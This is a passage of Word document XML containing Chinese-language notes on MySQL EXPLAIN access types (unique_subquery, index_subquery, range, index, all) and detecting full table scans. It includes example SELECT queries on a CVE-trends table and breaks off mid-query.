      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>子查询中，就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>value in (select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把形如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>select unique_key_column</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的子查询替换。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：所以不一定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>子句中使用子查询就是低效的！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47719583" w14:textId="77777777" w:rsidR="006A6923" w:rsidRDefault="006A6923" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64EB0A2F" w14:textId="77777777" w:rsidR="006A6923" w:rsidRDefault="006A6923" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6294C6D1" w14:textId="6B8192D6" w:rsidR="0039292A" w:rsidRDefault="0039292A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>index_subquery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同上，但把形如”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>select non_unique_key_column</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“的子查询替换</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2272DF8A" w14:textId="77777777" w:rsidR="006A6923" w:rsidRDefault="006A6923" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2775BB39" w14:textId="77777777" w:rsidR="006A6923" w:rsidRDefault="006A6923" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="009C2D66" w14:textId="2BF66B0E" w:rsidR="0039292A" w:rsidRDefault="0039292A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00401174">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>range</w:t>
      </w:r>
      <w:r w:rsidRPr="00401174">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00401174">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>常数值的范围</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CE0417" w14:textId="77777777" w:rsidR="006A6923" w:rsidRDefault="006A6923" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="657CBBC9" w14:textId="29BDB7EE" w:rsidR="00401174" w:rsidRDefault="00C663EE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C663EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>between</w:t>
      </w:r>
      <w:r w:rsidRPr="00C663EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00C663EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="00C663EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00C663EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C663EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都是典型的范围</w:t>
      </w:r>
      <w:r w:rsidRPr="00C663EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(range)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C663EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2497B499" w14:textId="77777777" w:rsidR="00401174" w:rsidRDefault="00401174" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52BC2361" w14:textId="77777777" w:rsidR="006A6923" w:rsidRDefault="006A6923" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="028663FF" w14:textId="627F8FCA" w:rsidR="0039292A" w:rsidRDefault="0039292A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>index</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>索引树扫描。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>当查询是索引覆盖的，即所有数据均可从索引树获取的时候（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Extra</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>中有</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Using Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>）；</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>b.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>以索引顺序从索引中查找数据行的全表扫描（无</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Using Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>）；</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>c.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Extra</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Using Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Using Where</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>同时出现的话，则是利用索引查找键值的意思；</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>d.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>如单独出现，则是用读索引来代替读行，但不用于查找</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F76A996" w14:textId="77777777" w:rsidR="006A6923" w:rsidRDefault="006A6923" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A726D12" w14:textId="42ACFB95" w:rsidR="006A6923" w:rsidRDefault="00A7149C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>index</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型，需要扫描索引上的全部数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E12EBE5" w14:textId="6CBA5071" w:rsidR="00A7149C" w:rsidRDefault="00A7149C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果是</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MyISAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引擎，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03266F03" w14:textId="77777777" w:rsidR="00A7149C" w:rsidRDefault="00A7149C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="239C6C90" w14:textId="32156939" w:rsidR="001F43EC" w:rsidRDefault="0039292A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>全表扫描</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7149C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(full table scan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136DBCC9" w14:textId="77777777" w:rsidR="001F43EC" w:rsidRDefault="001F43EC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="213D0F5F" w14:textId="77777777" w:rsidR="0039292A" w:rsidRDefault="0039292A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5447F540" w14:textId="77777777" w:rsidR="0039292A" w:rsidRDefault="0039292A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F21253B" w14:textId="77777777" w:rsidR="0039292A" w:rsidRDefault="0039292A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7283BBD6" w14:textId="77777777" w:rsidR="0039292A" w:rsidRDefault="0039292A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57123E02" w14:textId="77777777" w:rsidR="0039292A" w:rsidRDefault="0039292A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D96FAF3" w14:textId="77777777" w:rsidR="0039292A" w:rsidRDefault="0039292A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B8EB98C" w14:textId="77777777" w:rsidR="0039292A" w:rsidRDefault="0039292A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D19A7F4" w14:textId="77777777" w:rsidR="001F43EC" w:rsidRDefault="001F43EC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B017310" w14:textId="624B4645" w:rsidR="00A95593" w:rsidRDefault="00D95D83" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_Toc159779544"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查是否是全表扫描</w:t>
      </w:r>
      <w:r w:rsidR="00CC10CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：对</w:t>
      </w:r>
      <w:r w:rsidR="00CC10CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>datetime</w:t>
      </w:r>
      <w:r w:rsidR="00CC10CC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建立索引不起效</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p w14:paraId="02E9D3B2" w14:textId="77777777" w:rsidR="00D95D83" w:rsidRDefault="00D95D83" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73B25423" w14:textId="6D371C14" w:rsidR="00C25C02" w:rsidRDefault="00C25C02" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D025E8" w14:textId="1576C3C4" w:rsidR="00C25C02" w:rsidRDefault="00C25C02" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C25C02">
        <w:t>https://blog.csdn.net/qq_33934427/article/details/105078236</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0DE1B7" w14:textId="77777777" w:rsidR="00C25C02" w:rsidRDefault="00C25C02" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B758BFA" w14:textId="3808D55C" w:rsidR="00D95D83" w:rsidRDefault="004114B5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>explain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve"> cve_trends.twitter_trends </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve"> created_at =</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>'2023-05-10'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7380F4CE" w14:textId="77777777" w:rsidR="00037C1C" w:rsidRDefault="00037C1C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F073187" w14:textId="05020AB7" w:rsidR="00CA4765" w:rsidRDefault="00CA4765" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的话就是全表扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C19D475" w14:textId="77777777" w:rsidR="00CA4765" w:rsidRDefault="00CA4765" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25FB38E7" w14:textId="744B2506" w:rsidR="00D95D83" w:rsidRPr="00D95D83" w:rsidRDefault="00CA4765" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="304B3930" wp14:editId="670BCA9D">
            <wp:extent cx="5274310" cy="444500"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="16388270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444500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="189AE34F" w14:textId="77777777" w:rsidR="00D95D83" w:rsidRDefault="00D95D83" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E89EB07" w14:textId="77777777" w:rsidR="00C25C02" w:rsidRDefault="00C25C02" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5653437E" w14:textId="0A734AB5" w:rsidR="00A95593" w:rsidRDefault="00A95593" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="_Toc159779545"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内嵌查询</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:p w14:paraId="6BDBB952" w14:textId="77777777" w:rsidR="00A95593" w:rsidRDefault="00A95593" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C66D1AD" w14:textId="32D0C2E6" w:rsidR="00A95593" w:rsidRDefault="00D40516" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列、表都得重命名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4131B006" w14:textId="7C1A7305" w:rsidR="00A95593" w:rsidRDefault="00A95593" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve"> e2.cve_id,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>count</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve">(*) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E8F2FE"/>
        </w:rPr>
        <w:t xml:space="preserve"> d  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
